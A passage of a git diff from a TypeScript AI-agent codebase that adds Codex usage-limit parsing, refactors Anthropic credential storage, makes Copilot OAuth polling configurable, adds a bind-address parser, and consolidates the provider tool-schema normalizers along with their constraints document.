&& + !parsed.secondary && + parsed.allowed === undefined && + parsed.limitReached === undefined && + parsed.additional.length === 0 + ) { return null; } return parsed; @@ -251,6 +293,56 @@ function buildUsageLimit(args: { status: buildUsageStatus(amount.usedFraction, args.limitReached), }; } +function additionalLimitSlug(args: { limitName?: string; meteredFeature?: string }): string { + const probe = `${args.limitName ?? ""} ${args.meteredFeature ?? ""}`.toLowerCase(); + if (probe.includes("spark") || probe.includes("bengalfox")) return "spark"; + const source = (args.meteredFeature ?? args.limitName ?? "extra").toLowerCase(); + return ( + source + .replace(/^codex[-_]/, "") + .replace(/[^a-z0-9]+/g, "-") + .replace(/^-+|-+$/g, "") || "extra" + ); +} + +function additionalDisplayName(slug: string, limitName?: string): string { + if (slug === "spark") return "Spark"; + if (limitName) return limitName; + return slug.replace( + /(^|-)([a-z])/g, + (_match, sep: string, ch: string) => `${sep === "-" ? " " : ""}${ch.toUpperCase()}`, + ); +} + +function buildAdditionalUsageLimit(args: { + key: "primary" | "secondary"; + slug: string; + displayName: string; + window: ParsedUsageWindow; + accountId?: string; + limitReached?: boolean; + limitName?: string; + meteredFeature?: string; + nowMs: number; +}): UsageLimit { + const usageWindow = buildUsageWindow(args.window, args.key, args.nowMs); + const amount = buildUsageAmount(args.window); + return { + id: `openai-codex:${args.slug}:${args.key}`, + label: `${usageWindow.label} (${args.displayName})`, + scope: { + provider: "openai-codex", + accountId: args.accountId, + tier: args.slug, + modelId: args.limitName, + windowId: usageWindow.id, + shared: true, + }, + window: usageWindow, + amount, + status: buildUsageStatus(amount.usedFraction, args.limitReached), + }; +} export const openaiCodexUsageProvider: UsageProvider = { id: "openai-codex", @@ -327,6 +419,40 @@ export const openaiCodexUsageProvider: UsageProvider = { }), ); } + for (const extra of parsed?.additional ?? []) { + const slug = additionalLimitSlug({ limitName: extra.limitName, meteredFeature: extra.meteredFeature }); + const displayName = additionalDisplayName(slug, extra.limitName); + if (extra.primary) { + limits.push( + buildAdditionalUsageLimit({ + key: "primary", + slug, + displayName, + window: extra.primary, + accountId, + limitReached: extra.limitReached, + limitName: extra.limitName, + meteredFeature: extra.meteredFeature, + nowMs, + }), + ); + } + if (extra.secondary) { + limits.push( + buildAdditionalUsageLimit({ + key: "secondary", + slug, + displayName, + window: extra.secondary, + accountId, + limitReached: extra.limitReached, + limitName: extra.limitName, + meteredFeature: extra.meteredFeature, + nowMs, + }), + ); + } + } const report: UsageReport = { provider: "openai-codex", diff --git a/packages/ai/src/utils/anthropic-auth.ts b/packages/ai/src/utils/anthropic-auth.ts index dbfddcc87..a00b20a50 100644 --- a/packages/ai/src/utils/anthropic-auth.ts +++ b/packages/ai/src/utils/anthropic-auth.ts @@ -9,7 +9,7 @@ * 5. Generic Anthropic fallback (ANTHROPIC_API_KEY / ANTHROPIC_BASE_URL) */ import { $env, getAgentDbPath } from "@oh-my-pi/pi-utils"; -import { type AuthCredential, AuthCredentialStore } from "../auth-storage"; +import { type AuthCredential, type AuthCredentialStore, SqliteAuthCredentialStore } from "../auth-storage"; import { buildAnthropicHeaders as buildProviderAnthropicHeaders, normalizeAnthropicBaseUrl, @@ -80,7 +80,7 @@ function toAnthropicOAuthCredential(credential: AuthCredential): AnthropicOAuthC */ async function readAnthropicOAuthCredentials(store?: AuthCredentialStore): Promise<AnthropicOAuthCredential[]> { const ownsStore = !store; - const effectiveStore = store ?? (await AuthCredentialStore.open(getAgentDbPath())); + const effectiveStore = store ?? (await SqliteAuthCredentialStore.open(getAgentDbPath())); try { const records = effectiveStore.listAuthCredentials("anthropic"); const credentials: AnthropicOAuthCredential[] = []; @@ -133,7 +133,7 @@ export async function findAnthropicAuth(store?: AuthCredentialStore): Promise<An // Tiers 3-4 use the credential store; manage lifecycle once const ownsStore = !store; - const effectiveStore = store ?? (await AuthCredentialStore.open(getAgentDbPath())); + const effectiveStore = store ?? (await SqliteAuthCredentialStore.open(getAgentDbPath())); try { // 3. OAuth credentials in agent.db (with 5-minute expiry buffer) const expiryBuffer = 5 * 60 * 1000; // 5 minutes @@ -151,12 +151,14 @@ export async function findAnthropicAuth(store?: AuthCredentialStore): Promise<An } // 4. API key credentials in agent.db - const storedApiKey = effectiveStore.getApiKey("anthropic"); - if (storedApiKey) { + const apiKeyRecord = effectiveStore + .listAuthCredentials("anthropic") + .find(record => record.credential.type === "api_key"); + if (apiKeyRecord && apiKeyRecord.credential.type === "api_key") { return { - apiKey: storedApiKey, + apiKey: apiKeyRecord.credential.key, baseUrl: resolveAnthropicBaseUrlFromEnv() ?? DEFAULT_BASE_URL, - isOAuth: isOAuthToken(storedApiKey), + isOAuth: isOAuthToken(apiKeyRecord.credential.key), }; } } finally { diff --git a/packages/ai/src/utils/discovery/index.ts b/packages/ai/src/utils/discovery/index.ts index cfc12a2fa..7af3bebdf 100644 --- a/packages/ai/src/utils/discovery/index.ts +++ b/packages/ai/src/utils/discovery/index.ts @@ -1,5 +1,4 @@ export * from "./antigravity"; export * from "./codex"; -export * from "./cursor"; export * from "./gemini"; export * from "./openai-compatible"; diff --git a/packages/ai/src/utils/oauth/github-copilot.ts b/packages/ai/src/utils/oauth/github-copilot.ts index 7430846ff..15c421816 100644 --- a/packages/ai/src/utils/oauth/github-copilot.ts +++ b/packages/ai/src/utils/oauth/github-copilot.ts @@ -165,10 +165,12 @@ async function pollForGitHubAccessToken( intervalSeconds: number, expiresIn: number, signal?: AbortSignal, + pollIntervalFloorMs = 1000, + pollIntervalScaleMs = 1000, ) { const urls = getUrls(domain); const deadline = Date.now() + expiresIn * 1000; - let intervalMs = Math.max(1000, Math.floor(intervalSeconds * 1000)); + let intervalMs = Math.max(pollIntervalFloorMs, Math.floor(intervalSeconds * pollIntervalScaleMs)); let intervalMultiplier = INITIAL_POLL_INTERVAL_MULTIPLIER; let slowDownResponses = 0; @@ -212,7 +214,9 @@ async function pollForGitHubAccessToken( if (error === "slow_down") { slowDownResponses += 1; intervalMs = - typeof interval === "number" && interval > 0 ? interval * 1000 : Math.max(1000, intervalMs + 5000); + typeof interval === "number" && interval > 0 + ? Math.max(pollIntervalFloorMs, interval * pollIntervalScaleMs) + : Math.max(pollIntervalFloorMs, intervalMs + 5 * pollIntervalScaleMs); intervalMultiplier = SLOW_DOWN_POLL_INTERVAL_MULTIPLIER; continue; } @@ -308,6 +312,8 @@ export async function loginGitHubCopilot(options: { onPrompt: (prompt: { message: string; placeholder?: string; allowEmpty?: boolean }) => Promise<string>; onProgress?: (message: string) => void; signal?: AbortSignal; + pollIntervalFloorMs?: number; + pollIntervalScaleMs?: number; }): Promise<OAuthCredentials> { const input = await options.onPrompt({ message: "GitHub Enterprise URL/domain (blank for github.com)", @@ -337,6 +343,8 @@ export async function loginGitHubCopilot(options: { device.interval, device.expires_in, options.signal, + options.pollIntervalFloorMs, + options.pollIntervalScaleMs, ); // With opencode OAuth, the GitHub token is used directly for all API requests diff --git a/packages/ai/src/utils/parse-bind.ts b/packages/ai/src/utils/parse-bind.ts new file mode 100644 index 000000000..e55905e49 --- /dev/null +++ b/packages/ai/src/utils/parse-bind.ts @@ -0,0 +1,54 @@ +/** + * Shared `host:port` parser used by the auth-broker and auth-gateway boot + * paths. Centralized so the two servers can't drift on what they accept (the + * gateway used to silently allow empty hostnames; this fixes it). + */ + +export interface ParsedBind { + hostname: string; + port: number; +} + +function parsePort(raw: string, bind: string): number { + if (!/^\d+$/.test(raw)) { + throw new Error(`Invalid bind '${bind}'; port must be an integer.`); + } + const port = Number.parseInt(raw, 10); + if (!Number.isFinite(port) || port < 0 || port > 65535) { + throw new Error(`Invalid bind '${bind}'; port out of range.`); + } + return port; +} + +/** + * Parse a `host:port` (or bare `port`, which assumes loopback) string. + * + * Accepts: + * - `"4000"` → `127.0.0.1:4000` + * - `"0.0.0.0:4000"` → as written + * - `"[::1]:4000"` → as written (brackets retained, Bun handles them) + * + * Rejects: + * - empty input + * - empty hostname (`":4000"`) + * - non-integer / out-of-range port + */ +export function parseBind(raw: string): ParsedBind { + const trimmed = raw.trim(); + if (trimmed.length === 0) { + throw new Error("Invalid bind; expected 'host:port' or 'port'."); + } + if (/^\d+$/.test(trimmed)) { + return { hostname: "127.0.0.1", port: parsePort(trimmed, raw) }; + } + const lastColon = trimmed.lastIndexOf(":"); + if (lastColon < 0) { + throw new Error(`Invalid bind '${raw}'; expected 'host:port' or 'port'.`); + } + const hostPart = trimmed.slice(0, lastColon); + const portPart = trimmed.slice(lastColon + 1); + if (hostPart.length === 0) { + throw new Error(`Invalid bind '${raw}'; host must not be empty.`); + } + return { hostname: hostPart, port: parsePort(portPart, raw) }; +} diff --git a/packages/ai/src/utils/retry.ts b/packages/ai/src/utils/retry.ts index 1a04263f6..732f54914 100644 --- a/packages/ai/src/utils/retry.ts +++ b/packages/ai/src/utils/retry.ts @@ -34,11 +34,12 @@ const COPILOT_MODEL_RETRY_BASE_DELAY_MS = 400; */ export async function callWithCopilotModelRetry<T>( fn: () => Promise<T>, - options: { provider: string; signal?: AbortSignal }, + options: { provider: string; signal?: AbortSignal; retryBaseDelayMs?: number }, ): Promise<T> { if (options.provider !== "github-copilot") return fn(); let lastError: unknown; + const retryBaseDelayMs = options.retryBaseDelayMs ?? COPILOT_MODEL_RETRY_BASE_DELAY_MS; for (let attempt = 0; attempt < COPILOT_MODEL_RETRY_MAX_ATTEMPTS; attempt++) { try { return await fn(); @@ -46,7 +47,7 @@ export async function callWithCopilotModelRetry<T>( lastError = error; if (!isCopilotTransientModelError(error) && !isRetryableError(error)) throw error; if (attempt === COPILOT_MODEL_RETRY_MAX_ATTEMPTS - 1) break; - await scheduler.wait(COPILOT_MODEL_RETRY_BASE_DELAY_MS * (attempt + 1), { signal: options.signal }); + await scheduler.wait(retryBaseDelayMs * (attempt + 1), { signal: options.signal }); } } throw lastError; diff --git a/packages/ai/src/utils/schema/CONSTRAINTS.md b/packages/ai/src/utils/schema/CONSTRAINTS.md index fa03e2540..caccb2b7e 100644 --- a/packages/ai/src/utils/schema/CONSTRAINTS.md +++ b/packages/ai/src/utils/schema/CONSTRAINTS.md @@ -5,13 +5,10 @@ This document is the operational contract for schema normalization/strictness in ## Scope - Applies to provider-facing tool schemas produced by: - - `sanitize-google.ts` - - `normalize-cca.ts` - - `strict-mode.ts` - - `adapt.ts` - - `fields.ts` -- Covers OpenAI-style strict mode, Google schema constraints, and Cloud Code Assist Claude constraints. - + - `normalize.ts` — Google, CCA, MCP, OpenAI Responses, and OpenAI strict-mode (sanitize + enforce) sanitization. All schema walkers live here. + - `adapt.ts` — thin composer wrapping `tryEnforceStrictSchema` for provider call sites, plus the `PI_NO_STRICT` env flag callers consult to opt out of strict mode. + - `fields.ts` — keyword classification sets used by the walkers. +- Covers OpenAI-style strict mode, OpenAI Responses `oneOf` rejection, Google schema constraints, and Cloud Code Assist Claude constraints. --- ## 1) OpenAI-style strict mode (`adaptSchemaForStrict` / `tryEnforceStrictSchema`) @@ -57,9 +54,9 @@ When strict mode is requested (`strict=true` at call site), the schema MUST sati --- -## 2) Google Gemini / Vertex / Gemini CLI (`sanitizeSchemaForGoogle`) +## 2) Google Gemini / Vertex / Gemini CLI (`normalizeSchemaForGoogle`) -Schemas sent on Google JSON Schema path MUST follow: +Schemas sent on the Google JSON Schema path MUST follow: 1. **Unsupported JSON Schema keywords are stripped (except property names under `properties`)** - Unsupported keys (`UNSUPPORTED_SCHEMA_FIELDS`): @@ -70,6 +67,7 @@ Schemas sent on Google JSON Schema path MUST follow: - `minimum`, `maximum`, `exclusiveMinimum`, `exclusiveMaximum` - `pattern`, `format` - Important: keys inside a `properties` object are treated as property names and MUST NOT be stripped by keyword match. + - Human-meaningful stripped keys (`pattern`, `format`, min/max constraints, `default`, `examples`, etc.) are appended to the sibling `description` as an Anthropic-style spill block: `{pattern: "^foo$", minimum: 0}`. Structural/meta keys such as `$ref`, `$defs`, and `additionalProperties` are not spilled. 2. **`type` arrays are normalized to scalar type + nullable marker** - `type: ["T", "null"]` becomes `type: "T"` and `nullable: true`. @@ -78,25 +76,25 @@ Schemas sent on Google JSON Schema path MUST follow: 3. **`const` is converted to `enum`** - If `const` exists, schema uses/merges `enum` with the const value. -4. **`additionalProperties: false` is removed** - - This value is stripped during sanitization for Google compatibility. - +4. **Object schemas get an explicit properties map** + - `{ "type": "object" }` becomes `{ "type": "object", "properties": {} }`. --- -## 3) Claude via Cloud Code Assist (`prepareSchemaForCCA`) +## 3) Claude via Cloud Code Assist (`normalizeSchemaForCCA`) For Cloud Code Assist Claude tool declarations, schema MUST satisfy stricter constraints than generic Google path. ### 3.1 Transport contract 1. **Use legacy `parameters` field** (not `parametersJsonSchema`) for CCA Claude. -2. CCA path uses `sanitizeSchemaForCCA` + normalization pipeline. +2. CCA path uses the full `normalizeSchemaForCCA` pipeline. ### 3.2 Sanitization contract -1. Start with Google sanitizer behavior. +1. Start with Google unsupported-key stripping behavior. 2. **`nullable` keyword MUST be stripped** in CCA Claude path. 3. `type: ["T", "null"]` becomes `type: "T"` with no `nullable` marker. +4. Human-meaningful stripped keys are appended to `description` with the same spill format used by the Google dispatcher. ### 3.3 Combiner/union normalization contract @@ -145,10 +143,10 @@ If any remain, schema is incompatible. - Emit `strict: true` only when effective strict enforcement succeeded. - **Google Gemini/Vertex/Gemini CLI (non-CCA Claude)**: - - Use Google sanitizer and send schema on `parametersJsonSchema` path. + - Use `normalizeSchemaForGoogle` and send schema on `parametersJsonSchema` path. - **Cloud Code Assist Claude models (`model.id` starts with `claude-`)**: - - Use CCA preparation pipeline and send sanitized normalized schema in `parameters`. + - Use `normalizeSchemaForCCA` and send sanitized normalized schema in `parameters`. --- @@ -158,5 +156,9 @@ When adding/changing provider adapters: 1. Any new unsupported keyword MUST be added to the appropriate set in `fields.ts`. 2. Any new normalization rule MUST include regression tests under `packages/ai/test`. -3. Never bypass adapter helpers (`adaptSchemaForStrict`, `sanitizeSchemaForGoogle`, `prepareSchemaForCCA`) in provider code. +3. Never bypass adapter helpers (`adaptSchemaForStrict`, `normalizeSchemaForGoogle`, `normalizeSchemaForCCA`, `normalizeSchemaForMCP`) in provider code. 4. If a provider rejects schema with partial support, prefer deterministic per-tool fallback over request-wide failure. + +## 6) Gemini CLI / Antigravity CCA parity + +The Gemini CLI / Antigravity Claude path MUST run the same full `normalizeSchemaForCCA` pipeline as the shared Google Claude path. It MUST NOT call only the first keyword-stripping pass, because that leaves object combiners, nullable unions, residual combiners, and fallback gating inconsistent between transports. diff --git a/packages/ai/src/utils/schema/adapt.ts b/packages/ai/src/utils/schema/adapt.ts index 0e968da81..1c74f0a78 100644 --- a/packages/ai/src/utils/schema/adapt.ts +++ b/packages/ai/src/utils/schema/adapt.ts @@ -1,6 +1,18 @@ +import { $flag } from "@oh-my-pi/pi-utils"; import { upgradeJsonSchemaTo202012 } from "./draft"; -import { tryEnforceStrictSchema } from "./strict-mode"; -import type { JsonObject } from "./types"; +import { tryEnforceStrictSchema } from "./normalize"; + +/** + * Set when callers want to globally bypass OpenAI strict-mode enforcement + * (e.g. for debugging a provider that misreports strict support, or when + * comparing strict vs non-strict outputs). + * + * Honored by every provider that emits `strict: true` on its function tools — + * see `openai-completions`, `openai-responses`, `openai-codex-responses`, and + * the strict candidate selection in `anthropic`. + */ +export const NO_STRICT = $flag("PI_NO_STRICT"); + /** * Consolidated helper for OpenAI-style strict schema enforcement. * @@ -22,63 +34,3 @@ export function adaptSchemaForStrict( return tryEnforceStrictSchema(upgraded); } - -/** - * OpenAI Responses rejects `oneOf` in tool schemas even when strict mode is - * disabled. Non-strict schemas can still use `anyOf`, so preserve the union - * shape by recursively rewriting `oneOf` branches to `anyOf`. - */ -export function sanitizeSchemaForOpenAIResponses(schema: JsonObject): JsonObject { - return rewriteOneOfToAnyOf(schema) as JsonObject; -} - -/** - * Recursively replace every `oneOf` keyword with `anyOf`. Identity-preserving: - * returns the input reference unchanged when no rewrite occurred so callers - * can dedupe via reference equality (and the strict-mode cache stays warm). - * If a node has both `oneOf` and `anyOf`, the two are concatenated (the wire - * payload accepts a single union; preserving both would not survive). - */ -function rewriteOneOfToAnyOf(value: unknown): unknown { - if (Array.isArray(value)) { - let changed = false; - const rewritten = value.map(item => { - const next = rewriteOneOfToAnyOf(item); - if (next !== item) changed = true; - return next; - }); - return changed ? rewritten : value; - } - - if (!value || typeof value !== "object") { - return value; - } - - const input = value as Record<string, unknown>; - let changed = false; - const output: Record<string, unknown> = {}; - for (const key in input) { - const child = input[key]; - // Skip `oneOf` here; it is re-emitted as `anyOf` after the loop so - // neighboring `anyOf` entries can be folded in. - if (key === "oneOf") { - changed = true; - continue; - } - const next = rewriteOneOfToAnyOf(child); - if (next !== child) changed = true; - output[key] = next; - } - - // Re-emit `oneOf` content under `anyOf`, concatenating with any existing - // `anyOf` branches in the original node. - if (Array.isArray(input.oneOf)) { - const rewrittenOneOf = rewriteOneOfToAnyOf(input.oneOf); - const existingAnyOf = output.anyOf; - output.anyOf = Array.isArray(existingAnyOf) - ? [...existingAnyOf, ...(rewrittenOneOf as unknown[])] - : rewrittenOneOf; - } - - return changed ? output : value; -} diff --git a/packages/ai/src/utils/schema/compatibility.ts b/packages/ai/src/utils/schema/compatibility.ts index d52fe3f84..8ede79204 100644 --- a/packages/ai/src/utils/schema/compatibility.ts +++ b/packages/ai/src/utils/schema/compatibility.ts @@ -11,8 +11,8 @@ import { isJsonObject, type JsonObject } from "./types"; * Schema compatibility audits. * * Each provider has a different idea of what JSON Schema features it accepts - * for tool definitions. The sanitizers in `normalize-cca`, `sanitize-google`, - * and `strict-mode` rewrite incoming schemas to fit. This module is the + * for tool definitions. The normalizers in `normalize.ts`, `strict-mode`, + * and `adapt.ts` rewrite incoming schemas to fit. This module is the * *audit* counterpart: it walks a (presumably already-sanitized) schema and * reports any feature the target provider would reject. Tests use it to lock * down the contract; the runtime uses it to fail-open with diagnostic logs diff --git a/packages/ai/src/utils/schema/fields.ts b/packages/ai/src/utils/schema/fields.ts index d5f0dc46d..55457d0ef 100644 --- a/packages/ai/src/utils/schema/fields.ts +++ b/packages/ai/src/utils/schema/fields.ts @@ -11,7 +11,7 @@ /** * Google Generative AI unsupported schema fields. - * Stripped during sanitizeSchemaForGoogle / sanitizeSchemaForCCA. + * Stripped during normalizeSchemaForGoogle / normalizeSchemaForCCA. */ export const UNSUPPORTED_SCHEMA_FIELDS: Record<string, true> = { $schema: true, @@ -38,6 +38,30 @@ export const UNSUPPORTED_SCHEMA_FIELDS: Record<string, true> = { format: true, }; +/** + * Human-meaningful validation/decorative keywords that can be preserved in a + * sibling description when a provider-specific normalizer strips them from the + * wire schema. + */ +export const LIFTABLE_TO_DESCRIPTION_FIELDS: Record<string, true> = { + pattern: true, + format: true, + minLength: true, + maxLength: true, + minimum: true, + maximum: true, + exclusiveMinimum: true, + exclusiveMaximum: true, + multipleOf: true, + minItems: true, + maxItems: true, + uniqueItems: true, + minProperties: true, + maxProperties: true, + default: true, + examples: true, +}; + /** * Non-structural schema keys stripped during OpenAI strict mode sanitization. * These are decorative/validation-only keywords that don't affect the structural @@ -146,7 +170,7 @@ export const CLOUD_CODE_ASSIST_SHARED_SCHEMA_KEYS: Record<string, true> = { /** * Combinator keys used across schema sanitization modules. - * Defined once to avoid duplication in strict-mode.ts and normalize-cca.ts. + * Defined once to avoid duplication in strict-mode.ts and normalize.ts. */ export const COMBINATOR_KEYS = ["anyOf", "allOf", "oneOf"] as const; diff --git a/packages/ai/src/utils/schema/index.ts b/packages/ai/src/utils/schema/index.ts index d7c93e675..b89a511b8 100644 --- a/packages/ai/src/utils/schema/index.ts +++ b/packages/ai/src/utils/schema/index.ts @@ -6,8 +6,7 @@ export * from "./equality"; export * from "./fields"; export * from "./json-schema-validator"; export * from "./meta-validator"; -export * from "./normalize-cca"; -export * from "./sanitize-google"; -export * from "./strict-mode"; +export * from "./normalize"; +export * from "./spill"; export * from "./types"; export * from "./wire"; diff --git a/packages/ai/src/utils/schema/normalize-cca.ts b/packages/ai/src/utils/schema/normalize-cca.ts deleted file mode 100644 index fcf9fe61f..000000000 --- a/packages/ai/src/utils/schema/normalize-cca.ts +++ /dev/null @@ -1,490 +0,0 @@ -/** - * Cloud Code Assist (CCA) for Claude rejects most JSON Schema combinator and - * nullable shapes. This module is the multi-pass rewriter that turns whatever - * the tool author authored into the narrow subset CCA accepts: - * - * 1. `sanitizeSchemaForCCA` — strip Google-incompatible keywords, normalize - * `type: [..., "null"]` arrays into a scalar + nullable. - * 2. `mergeObjectCombinerVariants` — collapse `anyOf` of object variants - * into a single merged object. - * 3. `collapseMixedTypeCombinerVariants` — `anyOf` of distinct scalar types - * collapses to the first non-null type (lossy, intentional). - * 4. `collapseSameTypeCombinerVariants` — `anyOf` of variants with one - * shared type collapses to that variant (lossy, intentional). - * 5. `stripResidualCombiners` — fixpoint loop applying 3+4 to combiners that - * pass-1 merging produced from inside merged subtrees. - * 6. `normalizeNullablePropertiesForCloudCodeAssist` — extract `nullable: T` - * from `anyOf:[T,null]`-shaped property schemas and demote those keys - * from `required`. - * - * If any incompatibility survives, we ship a stub `{type:"object",properties:{}}` - * fallback for that tool — CCA will accept the call but the model will see no - * arguments documented. Better than rejecting the whole turn. - */ -import { logger } from "@oh-my-pi/pi-utils"; -import { areJsonValuesEqual, mergePropertySchemas } from "./equality"; -import { CLOUD_CODE_ASSIST_SHARED_SCHEMA_KEYS, CLOUD_CODE_ASSIST_TYPE_SPECIFIC_KEYS } from "./fields"; -import { isValidJsonSchema } from "./meta-validator"; -import { sanitizeSchemaForCCA } from "./sanitize-google"; -import { epochNext, once } from "./stamps"; -import type { JsonObject } from "./types"; -import { isJsonObject } from "./types"; - -/** Copy all keys from a schema except the specified combiner key. */ -export function copySchemaWithout(schema: JsonObject, combiner: string): JsonObject { - const { [combiner]: _, ...rest } = schema; - return rest; -} - -/** - * Claude via Cloud Code Assist (`parameters` path) can reject schemas that keep - * object variant combiners, so flatten object-only unions into one object shape. - */ -function mergeObjectCombinerVariants(schema: JsonObject, combiner: "anyOf" | "oneOf"): JsonObject { - const variantsRaw = schema[combiner]; - if (!Array.isArray(variantsRaw) || variantsRaw.length === 0) { - return schema; - } - - const variants: JsonObject[] = []; - for (const entry of variantsRaw) { - if (!isJsonObject(entry)) { - return schema; - } - const variantType = entry.type; - const hasObjectShape = - isJsonObject(entry.properties) || - Array.isArray(entry.required) || - Object.hasOwn(entry, "additionalProperties"); - if (variantType === undefined && !hasObjectShape) { - return schema; - } - if (variantType !== undefined && variantType !== "object") { - return schema; - } - if (entry.properties !== undefined && !isJsonObject(entry.properties)) { - return schema; - } - if (entry.required !== undefined && !Array.isArray(entry.required)) { - return schema; - } - variants.push(entry); - } - - const mergedProperties: JsonObject = {}; - const ownProperties = isJsonObject(schema.properties) ? schema.properties : {}; - for (const name in ownProperties) { - mergedProperties[name] = ownProperties[name]; - } - - for (const variant of variants) { - const properties = isJsonObject(variant.properties) ? variant.properties : {}; - for (const name in properties) { - const propertySchema = properties[name]; - const existingSchema = mergedProperties[name]; - mergedProperties[name] = - existingSchema === undefined ? propertySchema : mergePropertySchemas(existingSchema, propertySchema); - } - } - - const nextSchema = copySchemaWithout(schema, combiner); - - nextSchema.type = "object"; - nextSchema.properties = mergedProperties; - - // Compute the `required` set for the merged object. We intersect each - // variant's required keys (a property is only required if every variant - // required it) and then union in the parent's own required keys for - // properties that lived on the parent. Filter against `mergedProperties` - // so we never reference a key that does not exist on the result. - let requiredIntersection: string[] | undefined; - for (const variant of variants) { - const variantRequired = Array.isArray(variant.required) - ? variant.required.filter((r): r is string => typeof r === "string") - : []; - if (requiredIntersection === undefined) { - requiredIntersection = [...variantRequired]; - } else { - const reqSet = new Set(variantRequired); - requiredIntersection = requiredIntersection.filter(r => reqSet.has(r)); - } - } - const parentRequired = Array.isArray(schema.required) - ? schema.required.filter((r): r is string => typeof r === "string") - : []; - const safeRequired = new Set<string>(); - for (const name of requiredIntersection ?? []) { - if (name in mergedProperties) safeRequired.add(name); - } - for (const name of parentRequired) { - if (name in ownProperties && name in mergedProperties) { - safeRequired.add(name); - } - } - // Emit required in property-insertion order so the wire payload is stable. - const requiredInPropertyOrder: string[] = []; - for (const name in mergedProperties) { - if (safeRequired.has(name)) requiredInPropertyOrder.push(name); - } - if (requiredInPropertyOrder.length > 0) { - nextSchema.required = requiredInPropertyOrder; - } else { - delete nextSchema.required; - } - - return nextSchema; -} - -/** - * Collapse anyOf/oneOf with distinct typed variants into a single-type schema. - * Picks the first non-null type as a scalar. This is lossy for multi-type unions - * (e.g., string|number|null narrows to string), but CCA requires a scalar type field - * and an uncollapsed anyOf would be rejected by the CCA API at runtime. - */ -function collapseMixedTypeCombinerVariants(schema: JsonObject, combiner: "anyOf" | "oneOf"): JsonObject { - const variantsRaw = schema[combiner]; - if (!Array.isArray(variantsRaw) || variantsRaw.length === 0) { - return schema; - } - - const seenTypes = new Set<string>(); - const variantTypes: string[] = []; - const mergedVariantFields: JsonObject = {}; - for (const entry of variantsRaw) { - if (!isJsonObject(entry) || typeof entry.type !== "string") { - return schema; - } - - const variantType = entry.type; - if (seenTypes.has(variantType)) { - return schema; - } - - const allowedKeys = CLOUD_CODE_ASSIST_TYPE_SPECIFIC_KEYS[variantType]; - if (!allowedKeys) { - return schema; - } - - for (const key in entry) { - const variantValue = entry[key]; - if (key === "type") continue; - if (!(key in allowedKeys) && !(key in CLOUD_CODE_ASSIST_SHARED_SCHEMA_KEYS)) { - return schema; - } - - const existingValue = mergedVariantFields[key]; - if (existingValue !== undefined && !areJsonValuesEqual(existingValue, variantValue)) { - return schema; - } - mergedVariantFields[key] = variantValue; - } - - seenTypes.add(variantType); - variantTypes.push(variantType); - } - - if (variantTypes.length < 2 || variantTypes.every(type => type === "object")) { - return schema; - } - - const nextSchema = copySchemaWithout(schema, combiner); - - const nonNullTypes = variantTypes.filter(t => t !== "null"); - // Lossy: when multiple non-null types exist we pick the first. CCA requires - // a scalar type and keeping the anyOf would cause an API rejection at runtime. - nextSchema.type = nonNullTypes[0] ?? variantTypes[0]; - for (const key in mergedVariantFields) { - const value = mergedVariantFields[key]; - const existingValue = nextSchema[key]; - if (existingValue !== undefined && !areJsonValuesEqual(existingValue, value)) { - return schema; - } - if (existingValue === undefined) { - nextSchema[key] = value; - } - } - return nextSchema; -} - -/** - * Collapse anyOf/oneOf where all variants share the same primitive type. - * E.g. anyOf: [{type: "string", desc: "A"}, {type: "string", desc: "B"}] -> {type: "string", desc: "A"} - * Claude via CCA rejects any remaining anyOf/oneOf, so pick first variant. - * Note: constraints from non-first variants are silently dropped. - */ -function collapseSameTypeCombinerVariants(schema: JsonObject, combiner: "anyOf" | "oneOf"): JsonObject { - const variantsRaw = schema[combiner]; - if (!Array.isArray(variantsRaw) || variantsRaw.length === 0) return schema; - let commonType: string | undefined; - let firstEntry: JsonObject | undefined; - for (const entry of variantsRaw) { - if (!isJsonObject(entry) || typeof entry.type !== "string") return schema; - if (commonType === undefined) { - commonType = entry.type; - firstEntry = entry; - } else if (entry.type !== commonType) return schema; - } - if (!firstEntry) return schema; - const nextSchema = copySchemaWithout(schema, combiner); - for (const key in firstEntry) { - if (!(key in nextSchema)) nextSchema[key] = firstEntry[key]; - } - return nextSchema; -} - -/** - * Recursively strip any remaining anyOf/oneOf that collapseSameTypeCombinerVariants can handle. - * This is needed because mergeObjectCombinerVariants can create new anyOf in merged - * properties AFTER the recursive normalization pass has already processed children. - */ -export function stripResidualCombiners(value: unknown, epoch: number = epochNext()): unknown { - if (Array.isArray(value)) { - if (!once(value, epoch)) return []; - return value.map(entry => stripResidualCombiners(entry, epoch)); - } - if (!isJsonObject(value)) return value; - if (!once(value, epoch)) return {}; - const result: JsonObject = {}; - for (const key in value) { - result[key] = stripResidualCombiners(value[key], epoch); - } - let current: JsonObject = result; - let changed = true; - while (changed) { - changed = false; - for (const combiner of ["anyOf", "oneOf"] as const) { - const sameType = collapseSameTypeCombinerVariants(current, combiner); - if (sameType !== current) { - current = sameType; - changed = true; - } - const mixed = collapseMixedTypeCombinerVariants(current, combiner); - if (mixed !== current) { - current = mixed; - changed = true; - } - } - } - return current; -} - -function normalizeSchemaForCCA(value: unknown, epoch: number = epochNext()): unknown { - if (Array.isArray(value)) { - if (!once(value, epoch)) return []; - return value.map(entry => normalizeSchemaForCCA(entry, epoch)); - } - if (!isJsonObject(value)) { - return value; - } - if (!once(value, epoch)) return {}; - - const normalized: JsonObject = {}; - for (const key in value) { - normalized[key] = normalizeSchemaForCCA(value[key], epoch); - } - - const mergedAnyOf = mergeObjectCombinerVariants(normalized, "anyOf"); - const collapsedAnyOf = collapseMixedTypeCombinerVariants(mergedAnyOf, "anyOf"); - const sameTypeAnyOf = collapseSameTypeCombinerVariants(collapsedAnyOf, "anyOf"); - const mergedOneOf = mergeObjectCombinerVariants(sameTypeAnyOf, "oneOf"); - const collapsedOneOf = collapseMixedTypeCombinerVariants(mergedOneOf, "oneOf"); - return collapseSameTypeCombinerVariants(collapsedOneOf, "oneOf"); -} - -interface NullableExtractionResult { - schema: unknown; - nullable: boolean; -} - -function extractNullableUnionSchema(schema: unknown): NullableExtractionResult { - if (!isJsonObject(schema)) { - return { schema, nullable: false }; - } - - if (schema.nullable === true) { - const nextSchema = { ...schema }; - delete nextSchema.nullable; - return { schema: nextSchema, nullable: true }; - } - - if (Array.isArray(schema.type)) { - const typeVariants = schema.type.filter((entry): entry is string => typeof entry === "string"); - const nonNullTypes = typeVariants.filter(entry => entry !== "null"); - if (typeVariants.includes("null") && nonNullTypes.length === 1) { - const nextSchema = { ...schema, type: nonNullTypes[0] }; - return { schema: nextSchema, nullable: true }; - } - } - - for (const combiner of ["anyOf", "oneOf"] as const) { - const variantsRaw = schema[combiner]; - if 